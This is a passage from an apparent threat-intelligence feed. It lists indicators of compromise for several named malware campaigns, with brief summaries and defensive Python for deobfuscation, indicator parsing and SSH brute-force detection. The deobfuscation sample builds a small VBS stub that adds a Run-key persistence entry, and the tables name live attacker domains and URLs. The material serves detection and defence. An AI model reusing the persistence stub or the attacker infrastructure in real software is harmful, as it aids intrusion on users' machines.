622358469e5e24114dd0eb03da815576 |
FileHash-MD5 |
73ed9b012785dc3b3ee33aa52700cfe4 |
FileHash-SHA1 |
50e4d8a112e4aad2c984d22f83c80c8723f232da |
FileHash-SHA256 |
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229 |
IPv4 |
64.49.14.181 |
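The Kimsuky summary above notes that the VBS stages are hidden behind Base64 and a Caesar cipher. The block below is an added example, not code from the report or from the malware, showing how an analyst recovers such a payload without knowing the rotation: it tries all 26 shifts, Base64-decodes each candidate and keeps the one that looks most like a script. The wrapping order (Base64 first, then a letters-only rotation), the shift value 7, the marker tokens and the sample VBS stub are all assumptions constructed for the example; the real loader's exact scheme is not stated on this page.

```python
import base64
import binascii
import string

def caesar_shift(text, shift):
    """Rotate ASCII letters by `shift`; digits, '+', '/' and '=' pass through, so a
    shifted Base64 string stays inside the Base64 alphabet."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)

def obfuscate(plaintext, shift):
    """Constructed stand-in for the loader's wrapping (assumed order: Base64, then
    a letters-only Caesar rotation); used here only to build the sample blob."""
    return caesar_shift(base64.b64encode(plaintext.encode()).decode(), shift)

# Tokens an analyst expects in a VBS dropper that sets up persistence (assumed list).
SCRIPT_MARKERS = ("CreateObject", "WScript", "Shell", "schtasks", "HKCU")

def script_likeness(data):
    """Score a decode candidate: fraction of printable ASCII plus one point per marker.
    Wrong shifts decode to binary noise and score well under 2; the real script
    scores at least 2 (fully printable plus at least one marker)."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return 0.0
    printable = sum(ch in string.printable for ch in text) / max(len(text), 1)
    return printable + sum(m in text for m in SCRIPT_MARKERS)

def deobfuscate(blob):
    """Brute-force all 26 rotations, Base64-decode each, keep the most script-like.
    Returns (shift, decoded_text); shift is None if nothing decoded at all."""
    best_shift, best_text, best_score = None, None, 0.0
    for shift in range(26):
        candidate = caesar_shift(blob, -shift)
        try:
            raw = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
        score = script_likeness(raw)
        if score > best_score:
            best_shift, best_text, best_score = shift, raw.decode("ascii"), score
    return best_shift, best_text

# Constructed sample: a two-line persistence stub, wrapped with shift 7.
SAMPLE_VBS = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", '
    '"wscript.exe //B C:\\Users\\Public\\upd.vbs"\r\n'
)
SAMPLE_BLOB = obfuscate(SAMPLE_VBS, 7)

if __name__ == "__main__":
    shift, text = deobfuscate(SAMPLE_BLOB)
    print(f"shift={shift}\n{text}")
```

Because letters map to letters, every rotation is still syntactically valid Base64, so the decoder cannot rely on decode errors to reject wrong shifts; the printable-ratio plus marker scoring is what separates the real script from noise. Swap in whatever markers the sample you are looking at is known to contain.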
|
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC |
Earth Baxia, a suspected China-based threat actor, targeted government organizations, telecommunication businesses, and the energy industry in multiple Asia-Pacific countries. The group employed sophisticated techniques, including spear-phishing emails and exploitation of a GeoServer vulnerability (CVE-2024-36401). They deployed customized Cobalt Strike components and a new backdoor called EAGLEDOOR on compromised machines. EAGLEDOOR supports multiple communication protocols for information gathering and payload delivery. The attackers used public cloud services to host malicious files, making tracking difficult. They also utilized techniques like GrimResource and AppDomainManager injection to deploy additional payloads. The campaign affected countries including Taiwan, the Philippines, South Korea, Vietnam, Thailand, and potentially China. |
Type |
Indicator |
IPv4 |
167.172.89.142 |
CVE |
CVE-2024-36401 |
IPv4 |
152.42.243.170 |
IPv4 |
167.172.84.142 |
IPv4 |
188.166.252.85 |
hostname |
static.krislab.site |
FileHash-MD5 |
249c2d77aa53c36b619bdfbf02a817e5 |
FileHash-MD5 |
55689e6075629b68798c1feb2d168516 |
FileHash-MD5 |
9bbb096a052ad6e4055b39f2c9216026 |
FileHash-MD5 |
9f376a334f9362c6c316a56e2ffd4971 |
FileHash-MD5 |
e51f2ea5a877e3638457e01bf46a20e1 |
FileHash-SHA1 |
9833566856f924e4a60e4dd6a06bf9859061f4be |
FileHash-SHA1 |
d9b814f53e82f686d84647b7d390804b331f1583 |
FileHash-SHA1 |
dce0a4c008ea7c02d768bc7fd5a910e79781f925 |
FileHash-SHA1 |
e2b0c45beadff54771a0ad581670a10e76dc4cf1 |
FileHash-SHA256 |
04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e |
FileHash-SHA256 |
061bcd5b34c7412c46a3acd100167336685a467d2cbcd1c67d183b90d0bf8de7 |
FileHash-SHA256 |
1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee |
FileHash-SHA256 |
1c26d79a841fdca70e50af712f4072fea2de7faf5875390a2ad6d29a43480458 |
FileHash-SHA256 |
1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448 |
FileHash-SHA256 |
4ad078a52abeced860ceb28ae99dda47424d362a90e1101d45c43e8e35dfd325 |
FileHash-SHA256 |
4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54 |
FileHash-SHA256 |
6be4dd9af27712f5ef6dc7d684e5ea07fa675b8cbed3094612a6696a40c664ce |
FileHash-SHA256 |
916f3f4b895c8948b504cbf1beccb601ff7cc6e982d2ed375447bce6ecb41534 |
FileHash-SHA256 |
9b50e888aaec0e4d105a6f06db168a8a2dcf9ab1f9deeff4b7862463299ab1ca |
FileHash-SHA256 |
b3b8efcaf6b9491c00049292cdff8f53772438fde968073e73d767d51218d189 |
FileHash-SHA256 |
c78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc |
FileHash-SHA256 |
cef0d2834613a3da4befa2f56ef91afc9ab82b1e6c510d2a619ed0c1364032b8 |
FileHash-SHA256 |
d23dd576f7a44df0d44fca6652897e4de751fdb0becc6b14b754ac9aafc9081c |
FileHash-SHA256 |
d3c1ada67f9fe46dfb11f72c1754667d2ccd0026d48d37b61192e3d0ef369b84 |
FileHash-SHA256 |
e9854ab68dad0a744925118bfae4ec6ce9c4b7727e2ad6763aa50b923991de95 |
domain |
visualstudio-microsoft.com |
hostname |
api.s2cloud-amazon.com |
hostname |
ms1.hinet.lat |
hostname |
msa.hinet.ink |
hostname |
rocean.oca.pics |
hostname |
static.trendmicrotech.com |
hostname |
status.s3cloud-azure.com |
hostname |
us2.s3bucket-azure.online |
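The indicator tables on this page are flattened into alternating "Type |" and "Indicator |" rows, and feeds in this layout sometimes list the same indicator twice. The block below is an added example, not code from any of the cited reports, that parses that layout into records, checks each value against the syntax its declared type implies, normalises case, and drops repeats so the result can be loaded into a block list or SIEM. SAMPLE_ROWS is a constructed excerpt: its first indicators are copied from the Earth Baxia table above, with one repeated IP and one malformed hash added to exercise the checks.

```python
import re
from collections import OrderedDict

# Constructed excerpt in the feed's flattened "Type |" / "Indicator |" layout.
SAMPLE_ROWS = """\
Type |
Indicator |
IPv4 |
167.172.89.142 |
CVE |
CVE-2024-36401 |
hostname |
static.krislab.site |
FileHash-MD5 |
249c2d77aa53c36b619bdfbf02a817e5 |
IPv4 |
167.172.89.142 |
FileHash-SHA256 |
04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e |
FileHash-SHA1 |
notahash |
"""

# Syntax check per indicator type used on this page. A failing row is kept but
# flagged, so a typo in the source is visible instead of silently dropped.
VALIDATORS = {
    "FileHash-MD5": re.compile(r"^[0-9a-f]{32}$"),
    "FileHash-SHA1": re.compile(r"^[0-9a-f]{40}$"),
    "FileHash-SHA256": re.compile(r"^[0-9a-f]{64}$"),
    "IPv4": re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"),
    "CVE": re.compile(r"^CVE-\d{4}-\d{4,}$"),
    "domain": re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$"),
    "hostname": re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$"),
    "URL": re.compile(r"^https?://\S+$"),
}

def normalise(ioc_type, value):
    """Case-fold hashes and names so duplicates differing only in case collapse;
    URLs keep their case because paths can be case-sensitive."""
    value = value.strip()
    if ioc_type.startswith("FileHash") or ioc_type in ("domain", "hostname"):
        return value.lower()
    if ioc_type == "CVE":
        return value.upper()
    return value

def parse_ioc_table(text):
    """Turn alternating 'Type |' / 'Indicator |' rows into a list of
    {type, value, valid} dicts, deduplicated on (type, value) in first-seen order.
    The 'Type' / 'Indicator' header pair is skipped; an odd cell count means the
    table was truncated mid-row and is reported rather than guessed at."""
    cells = [ln.strip().rstrip("|").strip() for ln in text.splitlines() if ln.strip()]
    if cells[:2] == ["Type", "Indicator"]:
        cells = cells[2:]
    if len(cells) % 2:
        raise ValueError("odd number of cells: table is truncated or mis-split")
    seen = OrderedDict()
    for ioc_type, raw in zip(cells[0::2], cells[1::2]):
        if ioc_type not in VALIDATORS:
            raise ValueError(f"unknown indicator type {ioc_type!r}")
        value = normalise(ioc_type, raw)
        key = (ioc_type, value)
        if key in seen:
            continue  # verbatim repeat of an earlier row
        seen[key] = {
            "type": ioc_type,
            "value": value,
            "valid": bool(VALIDATORS[ioc_type].match(value)),
        }
    return list(seen.values())

def to_csv(records):
    """Emit 'type,value,valid' lines for import into a block list or SIEM."""
    return "\n".join(f"{r['type']},{r['value']},{int(r['valid'])}" for r in records)

if __name__ == "__main__":
    print(to_csv(parse_ioc_table(SAMPLE_ROWS)))
```

The validators are syntax checks only; they catch a truncated hash or a stray character, not a wrong indicator. Keep the flagged rows in the output so that whoever loads the list can decide whether to fix or drop them.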
|
Supershell Malware Being Distributed to Linux SSH Servers |
A Chinese-developed Go-based backdoor called Supershell is targeting poorly managed Linux SSH servers. The malware, which supports multiple platforms, primarily functions as a reverse shell for remote system control. Attackers use dictionary attacks from various IP addresses to gain access, then install Supershell directly or via a downloader script. The malware is downloaded from web and FTP servers. While Supershell is the initial payload for control hijacking, XMRig Monero CoinMiners are often installed alongside it, suggesting cryptocurrency mining as the ultimate goal. To protect against such attacks, administrators should use strong passwords (or disable password authentication in favour of SSH keys, which defeats dictionary attacks outright), update systems regularly, and implement security measures like firewalls. |
Type |
Indicator |
IPv4 |
107.189.8.15 |
FileHash-MD5 |
4ee4f1e7456bb2b3d13e93797b9efbd3 |
FileHash-MD5 |
5ab6e938028e6e9766aa7574928eb062 |
FileHash-MD5 |
e06a1ba2f45ba46b892bef017113af09 |
FileHash-SHA1 |
4b76040b0d4e2651f0c0a781c336ddebf8b8c057 |
FileHash-SHA1 |
a65ff070743b2bf15717e551b4be4e788fb25c08 |
FileHash-SHA1 |
c4e0241a4276cb15c95b52c673328de8abcf04b4 |
FileHash-SHA256 |
157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff |
FileHash-SHA256 |
23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa |
FileHash-SHA256 |
cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15 |
IPv4 |
45.15.143.197 |
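The dictionary-attack stage described above leaves a characteristic trace in sshd's auth log: a burst of "Failed password" lines from one source address followed, if the attack succeeds, by an "Accepted password" from the same address. The block below is an added example, not code from the report, that detects that pattern over a constructed log excerpt. The threshold, window and grace period are illustrative defaults; 203.0.113.7 (a documentation address) and 10.0.0.5 are invented for the sample and are not indicators from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth-log excerpt (not from the report). 203.0.113.7 stands in
# for a dictionary-attack source; 10.0.0.5 is an admin who mistyped once, then
# logged in with a key.
SAMPLE_AUTH_LOG = """\
Sep 20 03:14:01 web1 sshd[2231]: Failed password for invalid user admin from 203.0.113.7 port 51000 ssh2
Sep 20 03:14:02 web1 sshd[2232]: Failed password for invalid user oracle from 203.0.113.7 port 51001 ssh2
Sep 20 03:14:03 web1 sshd[2233]: Failed password for root from 203.0.113.7 port 51002 ssh2
Sep 20 03:14:04 web1 sshd[2234]: Failed password for root from 203.0.113.7 port 51003 ssh2
Sep 20 03:14:05 web1 sshd[2235]: Failed password for root from 203.0.113.7 port 51004 ssh2
Sep 20 03:14:09 web1 sshd[2240]: Accepted password for root from 203.0.113.7 port 51012 ssh2
Sep 20 03:20:00 web1 sshd[2300]: Failed password for alice from 10.0.0.5 port 40000 ssh2
Sep 20 03:20:30 web1 sshd[2301]: Accepted publickey for alice from 10.0.0.5 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_auth_log(text):
    """Return (timestamp, result, method, user, ip) tuples for each sshd auth line.

    Syslog timestamps carry no year; strptime fills in 1900, which is fine for
    the relative comparisons below but must be fixed before storing the events.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60),
                      success_grace=timedelta(minutes=10)):
    """Flag source IPs with at least `threshold` failures inside `window`, and
    escalate to likely_compromise when a password login from that IP succeeds
    within `success_grace` of the burst. Key-based logins are ignored because a
    dictionary attack cannot produce one."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, result, method, user, ip in events:
        if result == "Failed":
            failures[ip].append(ts)
        elif method == "password":
            successes[ip].append((ts, user))
    findings = {}
    for ip, times in failures.items():
        times.sort()
        burst_end = None
        # Sliding window over the sorted failure times: the first run of
        # `threshold` failures that fits inside `window` marks a burst.
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                burst_end = times[i + threshold - 1]
                break
        if burst_end is None:
            continue
        verdict, accounts = "bruteforce", []
        for ts, user in successes.get(ip, []):
            if burst_end <= ts <= burst_end + success_grace:
                verdict = "likely_compromise"
                accounts.append(user)
        findings[ip] = {"verdict": verdict, "failures": len(times), "accounts": accounts}
    return findings

if __name__ == "__main__":
    for ip, f in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, f)
```

On a real host the same logic runs over journalctl or /var/log/auth.log output; a likely_compromise verdict is the cue to look for the downloader script, the Supershell binary and any XMRig process the report describes, not just to block the source address.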
|
Unicorn: New Spy Scripts Steal Data from Russian Companies |
A new malware campaign targeting Russian energy companies, factories, and electronic component suppliers has been detected. The malware, distributed via email attachments or Yandex Disk links, uses RAR archives containing LNK files to download and execute malicious HTA files. These files create VBS scripts that establish persistence through registry keys and scheduled tasks. The scripts copy files from the user's home directory and Telegram data, then exfiltrate them to the attacker's server. Unlike typical attacks, this malware remains active, continuously stealing new and modified files. The campaign shows no clear connection to known threat groups and is detected as Trojan-Spy.VBS.Unicorn. |
Type |
Indicator |
FileHash-MD5 |
54562bd71d5e0d025297b25d4cacb384 |
FileHash-MD5 |
625d30bf6f54d47611f23c514c1dd4d6 |
FileHash-MD5 |
8009657da8b46f851ff8e833169d839d |
FileHash-MD5 |
86b4781b1ad041a3696df2efb269718f |
FileHash-MD5 |
c9a941a305f68d726b1e49b965b5812d |
URL |
https://yandex-drive.petition-change.org/file_preview/commecrial_list.pdf |
URL |
https://support.petition-change.org/unicorn |
|
Black Basta Ransomware: What You Need to Know |
Black Basta is a ransomware-as-a-service group that emerged in April 2022, known for double extortion tactics. They target organizations globally, particularly in North America, Europe, and Australia, affecting over 500 entities across various industries. Initial access is gained through phishing, Qakbot, Cobalt Strike, and vulnerability exploitation. The group uses tools like Mimikatz for credential theft and lateral movement. Their process involves data exfiltration using Rclone, followed by file encryption using the ChaCha20 algorithm. The ransomware disables system defenses, deletes shadow copies, and leaves a ransom note. Black Basta has been linked to the FIN7 threat actor due to similarities in EDR evasion techniques. |
Type |
Indicator |
FileHash-MD5 |
229ec577744224d4d2fb2091ac253dd8 |
FileHash-SHA1 |
497013697aba845b400d23bd774cf2ad09f4dae5 |
FileHash-SHA256 |
42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 |
CVE |
CVE-2020-1472 |
CVE |
CVE-2021-34527 |
CVE |
CVE-2021-42278 |
CVE |
CVE-2021-42287 |
CVE |
CVE-2024-1709 |
CVE |
CVE-2024-26169 |
FileHash-MD5 |
00da1d47bc0d09a01121553fa2693f26 |
FileHash-MD5 |
0165ff14fa840c0074a7ee5108858f8d |
FileHash-MD5 |
0bf7bc20496143a9f028e77ab47b4698 |
FileHash-MD5 |
1ce3b67e179c8420bd5b31e75b4427ca |
FileHash-MD5 |
24544104aaa9931b8cc0c68622864488 |
FileHash-MD5 |
2a255e75f72ac142689082437a866c32 |
FileHash-MD5 |
2b7fc9dd400d92cc64627115b47a592f |
FileHash-MD5 |
2c383f6fa25eea59fc54e5af19861fba |
FileHash-MD5 |
2d5cefe02cef5d14da7d609f0ccad1bc |
FileHash-MD5 |
2f90cd68e4a92c5151c6e43902397a13 |
FileHash-MD5 |
3f400f30415941348af21d515a2fc6a3 |
FileHash-MD5 |
403dee0dd3891459b22a8a37828b66b8 |
FileHash-MD5 |
470c803b32209fbeb09af80a1b83e6f2 |
FileHash-MD5 |
497ef4779c6770e4497adf0bc71655f1 |
FileHash-MD5 |
4c54bec464ba0c2b9d522643e1b3ebe7 |
FileHash-MD5 |
4e8a7b03ff758f5c75ce992615a14fd0 |
FileHash-MD5 |
59db7bd22d4ec503b768ece646205c27 |
FileHash-MD5 |
5c421d53680a56650df20fd71485ca0f |
FileHash-MD5 |
640132bbf92eb7c794a5c593fbb362de |
FileHash-MD5 |
6441d7260944bcedc5958c5c8a05d16d |
FileHash-MD5 |
65e8bd5b9128574f1122527b32e1dc21 |
FileHash-MD5 |
6785c08d9b83fa5f94b9e07f3434d7ca |
FileHash-MD5 |
6a202e9a95f58938d02385e31d43ed87 |
FileHash-MD5 |
6b010dcbc9c09b06b16e6a6cc6387a7b |
FileHash-MD5 |
6d5b9675b68bac95b885b4bb294134a1 |
FileHash-MD5 |
6eb89be04f8c1823cfabd28f0f57139b |
FileHash-MD5 |
6f01787f5f644916b2dda5b4295efa4f |
FileHash-MD5 |
6f9f4b7e63692eb7dcbc0957d3e7530e |
FileHash-MD5 |
7688c1b7a1124c1cd9413f4b535b2f44 |
FileHash-MD5 |
80ab6a4d16c8137308dea1dc7922bd47 |
FileHash-MD5 |
8bae9edbf5b1035cd52ca45b23fee29d |
FileHash-MD5 |
97abffeaa7bdfaa81532bd6028498225 |
FileHash-MD5 |
9f727c56a415bf8ffa884ef241bbcd10 |
FileHash-MD5 |
a292fee8d8db83711e72c06d6f82562d |
FileHash-MD5 |
a41afe748aed818ab6ac94e81bdde610 |
FileHash-MD5 |
adb3cf03e9be744107e61bd7de4c26bd |
FileHash-MD5 |
afa27795c0c86b6afeb138d0fb09506b |
FileHash-MD5 |
b365faebaf416681b5f376c8aa4f4470 |
FileHash-MD5 |
b648b7305df49492c44a1280ec2228a0 |
FileHash-MD5 |
bc95f228b11fa3b4e91c30d98f9f3bff |
FileHash-MD5 |
c115bbbdb1a61f8c553d74802bfd78fb |
FileHash-MD5 |
cddf2c9ac528b27af98da74dcb8d6ea0 |
FileHash-MD5 |
ce99e91e6c2a6defe1a86462870ba321 |
FileHash-MD5 |
d1ae751134e04bf6188aaed148409620 |
FileHash-MD5 |
d50a3b60eb046c5d7bc6768bd3d7f1b9 |
FileHash-MD5 |
d513a09a10122ba8cd6df651aae35fb0 |
FileHash-MD5 |
dd611cf3137868795121a44518139ca4 |
FileHash-MD5 |
e4d9351749d5b713b3838ba7b1fe8060 |
FileHash-MD5 |
e52aa8e50c0ccf883b7ab7f0c36bb878 |
FileHash-MD5 |
e7d5201947829fd265a0356771fbeb63 |
FileHash-MD5 |
e83d6092439a90af2b4b1db2ad3a9c5a |
FileHash-MD5 |
eaaa577b690501adf1969b71e5636e0f |
FileHash-MD5 |
ed891e4fd173700fac93b3dda30517c9 |
FileHash-MD5 |
eff424376edca5680b90ea9fedad163d |
FileHash-MD5 |
f05dac112cd3174c385d10158b6080fb |
FileHash-MD5 |
f309d2c8a5c82367f0fd2be457055813 |
FileHash-MD5 |
f74cec233a9609461e7518dd4c90207b |
FileHash-MD5 |
ff2f71dffeb997583fd297695de8c4ae |
FileHash-SHA1 |
0110e12ae768872ea5c1b194dba50cbf74ec4d84 |
FileHash-SHA1 |
0b0699b324dfcd6fc40abe39d2eef7d95f1dd782 |
FileHash-SHA1 |
1f439569e3c1c14ea9f02235f8f45c49e2764160 |
FileHash-SHA1 |
2084ae47dcdda6161c8697e995512448facba37c |
FileHash-SHA1 |
25ce6c74a6f39289717522cad5eacdf5b9f4bae8 |
FileHash-SHA1 |
26ab576a0abf7085ecf6321a311a7b3088ee48ae |
FileHash-SHA1 |
328a8793323f11c1d0c5f3ddedf4ae10caafb063 |
FileHash-SHA1 |
3c13c1e54d2d7991c1c3452ae89888a8e7a47763 |
FileHash-SHA1 |
4090622f0eadc1b420aa5d55e31ca5cd45e05f12 |
FileHash-SHA1 |
46257982840493eca90e051ff1749e7040895584 |
FileHash-SHA1 |
47dacafb5dace4c5fea931e9a7392f76fdde3e98 |
FileHash-SHA1 |
4da6fef533b37a12ed1e357df66802de29c1ab5c |
FileHash-SHA1 |
530f9163be551b7488650542de31cdfd11307d63 |
FileHash-SHA1 |
53628c7a155ccb7af1135140083939018d3587f1 |
FileHash-SHA1 |
5644a0282ac420c46d3b43fbb409eb9f7842b3af |
FileHash-SHA1 |
579b245a6609903d804f957083b9e0b2ed145f5a |
FileHash-SHA1 |
591d363928f0d5f4629196d60fd899469267da09 |
FileHash-SHA1 |
6c90b89aad04f38c584fcee1d47fed9cd79f8ef1 |
FileHash-SHA1 |
6fe84c129f76d309032e26aba3c33ba0b64172e8 |
FileHash-SHA1 |
7131a6f16aa8534a9cec7e11e37423aea4c09784 |
FileHash-SHA1 |
74dbf463be3139a28d9851b3b80c2ecac3e56304 |
FileHash-SHA1 |
757932f6038b71c5dbc380a2f28b077b41fbce9b |
FileHash-SHA1 |
79054b409cb1c7a36aafd9a9915f948e2f018734 |
FileHash-SHA1 |
796531afd0e828f451786c485f95c4c04084f461 |
FileHash-SHA1 |
7a33162908cba6678dc75d688da1f86b54849782 |
FileHash-SHA1 |
80a973c3da41c6479cc9d7036090adc1264c02a4 |
FileHash-SHA1 |
82f88c1af036181ee4e92a2f9338c152d1ff0c58 |
FileHash-SHA1 |
8bf65a11e42b5850e1a5f28513dae1ffc168730e |
FileHash-SHA1 |
8ccac360e2ca37b2fa9f5fa81b22114fb8936120 |
FileHash-SHA1 |
8e714d9fdbc27d2aa9abdadc728c219623b1e573 |
FileHash-SHA1 |
9171f38c2a3115c3b21aba939a7c55cd9e726d9b |
FileHash-SHA1 |
919c33adb648ce13ee8bd7c11bffbfd836936c00 |
FileHash-SHA1 |
92408a8233567f8b10f30f83dfcdd98effe96dca |
FileHash-SHA1 |
9468012acf6df7a0e593f41e0da8123f541277df |
FileHash-SHA1 |
9e24c4e231b93142419ac20e58dd71388f7d8ab7 |
FileHash-SHA1 |
a1a698a0bdda712905950ba6414bb1fcabdd8e84 |
FileHash-SHA1 |
a44a251e98a905adfedd46edb4541b2a92ae3a20 |
FileHash-SHA1 |
a977631006818fc5717b9fbce0609c58080a8ab2 |
FileHash-SHA1 |
aa54013aeb502b4a936331deb76a6411f1f1ade7 |
FileHash-SHA1 |
ad0e80af469165da713467b13d9a2500ee340427 |
FileHash-SHA1 |
b4c5c1e0690fdb1fc8abec8abcec8633d6d5c2bb |
FileHash-SHA1 |
bd0bf9c987288ca434221d7d81c54a47e913600a |
FileHash-SHA1 |
c419ed515b5267bb39870bdedcdd8dd8b172574c |
FileHash-SHA1 |
c69ffb5061ec42c876531f153c5b94302d6d9daf |
FileHash-SHA1 |
cc7ea6bb6787df664adb69022546c42f5f409653 |
FileHash-SHA1 |
ce77bd3224f47ae4b8a04bd4b4be91c3550de294 |
FileHash-SHA1 |
d32e44f7e04a8c84e7159ed020dcf26b6e51416e |
FileHash-SHA1 |
db497b95c79e41212577db0ba06777b62db209ff |
FileHash-SHA1 |
ddd40fb7335abc4ef736ecc12a909c6329783a05 |
FileHash-SHA1 |
e05e9cc2f28bcd17f5285a34db2894bad9ccd53a |
FileHash-SHA1 |
e1caf6484d899e7bb4d0c72e8bea8ff718ff073a |
FileHash-SHA1 |
ec944a8daaa706ff5557d7fedd17bc6ba21bf96d |
FileHash-SHA1 |
f0ae322f5067b20ee89d9826dc806abdd610fb60 |
FileHash-SHA1 |
f3d31b5d4bec32a50e8a76430c801d1b8c4e6b70 |
FileHash-SHA1 |
f4553d3aa92d4c97353645451c531881e8f0991a |
FileHash-SHA1 |
f502f703f6fc65ab91d80e8d581acaffb6a93695 |
FileHash-SHA1 |
fe540dd2ba50edb2ecbef0c0180e732ff2403592 |
FileHash-SHA1 |
ff57cda4829978d8b6f7f1f31356f291b37acaa6 |
FileHash-SHA256 |
0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a |
FileHash-SHA256 |
05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 |
FileHash-SHA256 |
07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 |
FileHash-SHA256 |
09bc7247b50a166996b667b9a6e696cfbafa203ffcbec46ad0cca27deacd5c25 |
FileHash-SHA256 |
0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e |
FileHash-SHA256 |
0bce6dc27d2cbdc231b563427c3489ddc69a0a88012abccd49b32c931dd93a81 |
FileHash-SHA256 |
0c964ac2f65f270eb19982b04ae346e72976bdf19b88ffd2308700dcce2b5ec0 |
FileHash-SHA256 |
0da309cc4f0d21c76c26d7b4f1c65bb1659908f191edb01d76ff22c8dabef0b1 |
FileHash-SHA256 |
0db7a0327192710c403e021cbfc3902d75c729b3ba59d87159bf8f59a151a481 |
FileHash-SHA256 |
1391c20a26f248f7c602f20096bf1886cfe7e4d151602a1258a9bbe7c02c1c80 |
FileHash-SHA256 |
15abbff9fbce7f5782c1654775938dcd2ce0a8ebd683a008547f8a4e421888c4 |
FileHash-SHA256 |
17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 |
FileHash-SHA256 |
17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 |
FileHash-SHA256 |
1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 |
FileHash-SHA256 |
1d040540c3c2ed8f73e04c578e7fb96d0b47d858bbb67e9b39ec2f4674b04250 |
FileHash-SHA256 |
1ed076158c8f50354c4dba63648e66c013c2d3673d76ac56582204686aae6087 |
FileHash-SHA256 |
1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e |
FileHash-SHA256 |
203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b |
FileHash-SHA256 |
21033cd24a9d775d7daa7bbc5c5b007553f205ac0febb6bae3fa35c700676bda |
FileHash-SHA256 |
3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 |
FileHash-SHA256 |
3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a |
FileHash-SHA256 |
350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd |
FileHash-SHA256 |
360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 |
FileHash-SHA256 |
37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 |
FileHash-SHA256 |
39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead |
FileHash-SHA256 |
3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a |
FileHash-SHA256 |
3eb22320da23748f76f2ce56f6f627e4255bc81d09ffb3a011ab067924d8013b |
FileHash-SHA256 |
449d87ca461823bb85c18102605e23997012b522c4272465092e923802a745e9 |
FileHash-SHA256 |
462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 |
FileHash-SHA256 |
46be54f719ee76af15099de6e337b05a0a442c813e815bbed92a71135cfd9ab2 |
FileHash-SHA256 |
48976d7bf38cca4e952507e9ab27e3874ca01092eed53d0fde89c5966e9533bb |
FileHash-SHA256 |
4b83aaecddfcb8cf5caeff3cb30fee955ecfc3eea97d19dccf86f24c77c41fc4 |
FileHash-SHA256 |
50f45122fdd5f8ca05668a385a734a278aa126ded185c3377f6af388c41788cb |
FileHash-SHA256 |
51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e |
FileHash-SHA256 |
5211ad84270862e68026ce8e6c15c1f8499551e19d2967c349b46d3f8cfcdcaa |
FileHash-SHA256 |
53a06b78d89fe3f981ff32cd7a66f31e099d4bbaac36d7c64ed08d615d314408 |
FileHash-SHA256 |
58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd |
FileHash-SHA256 |
5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 |
FileHash-SHA256 |
